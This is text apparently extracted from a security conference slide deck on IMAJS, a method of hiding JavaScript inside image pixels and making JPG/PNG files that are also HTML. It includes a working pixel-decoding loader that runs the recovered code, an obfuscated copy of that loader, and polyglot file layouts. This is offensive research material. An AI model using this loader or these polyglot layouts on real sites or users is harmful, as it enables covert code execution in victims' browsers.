    NETSQUARE decode_pixels.js L=2,C=3,G=3,a=[],x=y=0,z=1<<L,I=parseInt,S=String.fromCharCode;window.onload= function(){P.onclick=function({V=document.createElement("canvas");k=P.parentNode; k.insertBefore(V,P);W=V.width=P.width;H=V.height=P.height;m=V.getContext("2d"); m.drawImage(P,0,0);k.removeChild(P);m=m.getImageData(0,0,W,H).data;c=function(p,x,y) {n=(y*W+x)*4;r=(p[n]&z)>>L;g=(p[n+1]&z)>>L;b=(p[n+2]&z)>>L;return S([r,g,b,r][C]+48)}; k=function(l){for(i=j=0;j<l*8;j++){a[i++]=c(m,x,y);x+=G;if(x>=W){x=0;y+=G}}};k(6); k(I(X(a)));try{CollectGarbage()}catch(e){}setTimeout(new Function(X(a)),99)}};function X(c){s="",d=c.join(s);for(i=0;i<d.length;i+=8)s+=S(I(d.substr(i,8),2));returns} $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$) +"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""+$.__$+$.__$+$.$__+"="+$._$_+","+$.__$+$.___+$._$$+"="+$._$$+","+ $.__$+$.___+$.$$$+"="+$._$$+","+$.$_$_+"=[],"+$.__$+$.$$$+$.___+"="+$.__$+$.$$$+$.__$+"="+$.___+","+$.__$+$.$$$+$._$_+"="+$.__$+"<<"+$.__$+$.__$+$.$__+","+$.__$+$.__$+$.__$+"="+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+ $.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$$_+$.__+","+$.__$+$._$_+$._$$+"="+$.__$+$._$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+"."+$.$$$$+""+$.__$+ $.$$_+$._$_+$._$+""+$.__$+$.$_$+$.$_$+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.__$+$.___+$._$$+$._$+$.$$_$+$.$$$_+";"+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$_$+$._$+" "+$.__$+$.$$_+$.$$$+"."+$._$+""+$.__$+$.$_$+$.$$_+(![]+"")[$._$_]+$._$+$.$_$_+$.$$_$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.___+"."+$._$+""+$.__$+$.$_$+$.$$_ +$.$$__+(![]+"")[$._$_]+""+$.__$+$.$_$+$.__$+$.$$__+""+$.__$+$.$_$+$._$$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.$$_+"="+$.$$_$+$._$+$.$$__+$._+""+$.__$+$. $_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+""+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+""+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"(""+$.$$__+$.$_$_+""+$.__$+$. $_$+$.$$_+""+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$$+"");"+$.__$+$.$_$+$._$$+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+""+$.__$+$.__$+$.$$_+$._$+$.$$_$+$.$$ $_+";"+$.__$+$.$_$+$._$$+"."+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+""+$.__$+$.___+$._$_+$.$$$_+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+$.$$$_+"("+$.__$+$._$_+$.$$_+","+$.__$+$._ $_+$.___+");"+$.__$+$._$_+$.$$$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+$.___+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+ $.___+";"+$.__$+$.__$+$.___+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+"="+$.__$+$._$_+$.___+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+ $.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+";"+$.__$+$.$_$+$.$_$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.$$_+$.__+$.$$$_+""+$.__$+$.$$$+$.___+$.__+"(""+$._$_+$.$$_$+" ");"+$.__$+$.$_$+$.$_$+"."+$.$$_$+""+$.__$+$.$$_+$._$_+$.$_$_+""+$.__$+$.$$_+$.$$$+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"("+$.__$+$._$_+$.___+","+$.___+","+$.___+");"+$.__$+$.$_$+$._$$+"."+ $.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$_$+$._$+""+$.__$+$.$$_+$.$$_+$.$$$_+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.__$+$._$_+$.___+");"+$.__$+$.$_$+$.$_$+"="+$.__$+$.$_$+$.$_ $+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+""+$.__$+$.___+$.$__+$.$_$_+$.__+$.$_$_+"("+$.___+","+$.___+","+$.__$+$._$_+$.$$$+","+$.__$+$.__$+$.___+")."+$.$$_$+ $.$_$_+$.__+$.$_$_+";"+$.$$__+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$.___+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+"){"+$.__$+$.$_$+$.$$_+"=("+$.__$+$.$$ $+$.__$+"*"+$.__$+$._$_+$.$$$+"+"+$.__$+$.$$$+$.___+")*"+$.$__+";"+$.__$+$.$$_+$._$_+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$__+$.$$$+"=("+$.__$+$.$$_+$.___+"["+ $.__$+$.$_$+$.$$_+"+"+$.__$+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.$_$$+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"+"+$._$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$$_+$._$_+$.$$$_+$.__+$._+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$_+$._$$+"(["+$.__$+$.$$_+$._$_+","+$.__$+$.$__+$.$$$+","+$.$_$$+","+$.__$+$.$$_+$._$_+"]["+$.__$+$.___+$._$$+"]+"+$.$__+$.$___+")};"+$.__$+$.$_$+$._$$+"="+$.$$$$+ $._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+(![]+"")[$._$_]+"){"+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.__$+$.$_$+$._$_+"="+$.___+";"+$.__$+$.$_$+$._$_+"<"+(![]+"")[$._$_] +"*"+$.$___+";"+$.__$+$.$_$+$._$_+"++){"+$.$_$_+"["+$.__$+$.$_$+$.__$+"++]="+$.$$__+"("+$.__$+$.$_$+$.$_$+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+");"+$.__$+$.$$$+$.___+"+="+$.__$+$.___+$.$$$+";"+$.__$+$.$_$+$.__$+$.$$$$+"("+ $.__$+$._$_+$.$$$+"<"+$.__$+$.$$$+$.___+"){"+$.__$+$.$$$+$.___+"="+$.___+";"+$.__$+$.$$$+$.__$+"+="+$.__$+$.___+$.$$$+"}}};"+$.__$+$.$_$+$._$$+"("+$.$$_+");"+$.__$+$.$_$+$._$$+"("+$.__$+$.__$+$.__$+"("+$.__$+$._$$+$.___+"("+$.$_$_ +")));"+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$$$+$.__$+"{"+$.__$+$.___+$._$$+$._$+(![]+"")[$._$_]+(![]+"")[$._$_]+$.$$$_+$.$$__+$.__+""+$.__$+$.___+$.$$$+$.$_$_+""+$.__$+$.$$_+$._$_+$.$_$$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"()}"+$.$$__+ $.$_$_+$.__+$.$$__+""+$.__$+$.$_$+$.___+"("+$.$$$_+"){}"+$.__$+$.$$_+$._$$+$.$$$_+$.__+""+$.__$+$._$_+$.$__+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$_$+$.$$$_+$._$+$._+$.__+"("+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.$$$+""+$. $__+$.___+""+$.__$+$.___+$.$$_+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$._$$+$.___+"("+$.$_$_+")),"+$.$__$+$.$__$+")}};"+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$. $_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$$+$.___+"("+$.$$__+"){"+$.__$+$.$$_+$._$$+"="","+$.$$_$+"="+$.$$__+"."+$.__$+$.$_$+$._$_+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$._$$+");"+ $.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.___+";"+$.__$+$.$_$+$.__$+"<"+$.$$_$+"."+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+$.__+""+$.__$+$.$_$+$.___+";"+$.__$+$.$_$+$.__$+"+="+$.$___+")"+ $.__$+$.$$_+$._$$+"+="+$.__$+$._$_+$._$$+"("+$.__$+$.__$+$.__$+"("+$.$$_$+"."+$.__$+$.$$_+$._$$+$._+$.$_$$+""+$.__$+$.$$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+","+$.$___+"),"+$._$_+"));"+$.__$+$.$$_+$._$_+$.$$$_+ $.__+$._+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$.$$_+$._$$+"}"+""")())();
  • 23.
    NETSQUARE Step 3. Images that ``AutoRun`` IMAJS STEGO- DECODER JAVASCRIPT POLYGLOT ENCODED IMAGE
  • 24.
  • 25.
    NETSQUARE IMAJS - Image+JSPolyglot Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
  • 26.
    NETSQUARE "Nakatomi space", wherein buildingsreveal near-infinite interiors, capable of being traversed through all manner of non-architectural means http://www.bldgblog.com/2010/01/nakatomi-space/
  • 27.
  • 28.
    NETSQUARE JPG Header SOI FFD8 APP0 length J F I F 0 versn Xres DQT SOF0 DHT FF E0 U Yres H V FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
  • 29.
    NETSQUARE IMAJS-JPG SOI FF D8 APP0length J F I F 0 versn Xres FF E0 U Yres H V Nakatomi Space! ... more random data ... <html random random random random > and other HTML stuff goes here... <head random> IMAJS decoder script <script type=text/undefined> ... DQT SOF0 DHT FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
  • 30.
    NETSQUARE IMAJS-PNG Inspiration: http://daeken.com/superpacking-js-demos PNG Header89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength _00<html random random ... > CRC <head random> IMAJS decoder script and other HTML stuff goes here... <script type=text/undefined>... extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
    NETSQUARE Browsers and W3C- Wake Up! Dear BROWSERS, •  Don't be afraid to "BREAK THE WEB". •  Reject content that does not conform to strict standards/specs. Dear W3C, •  STRICT parsing rules – like COMPILERS. •  Browser compliance and user- awareness is YOUR responsibility.
  • 38.
  • 39.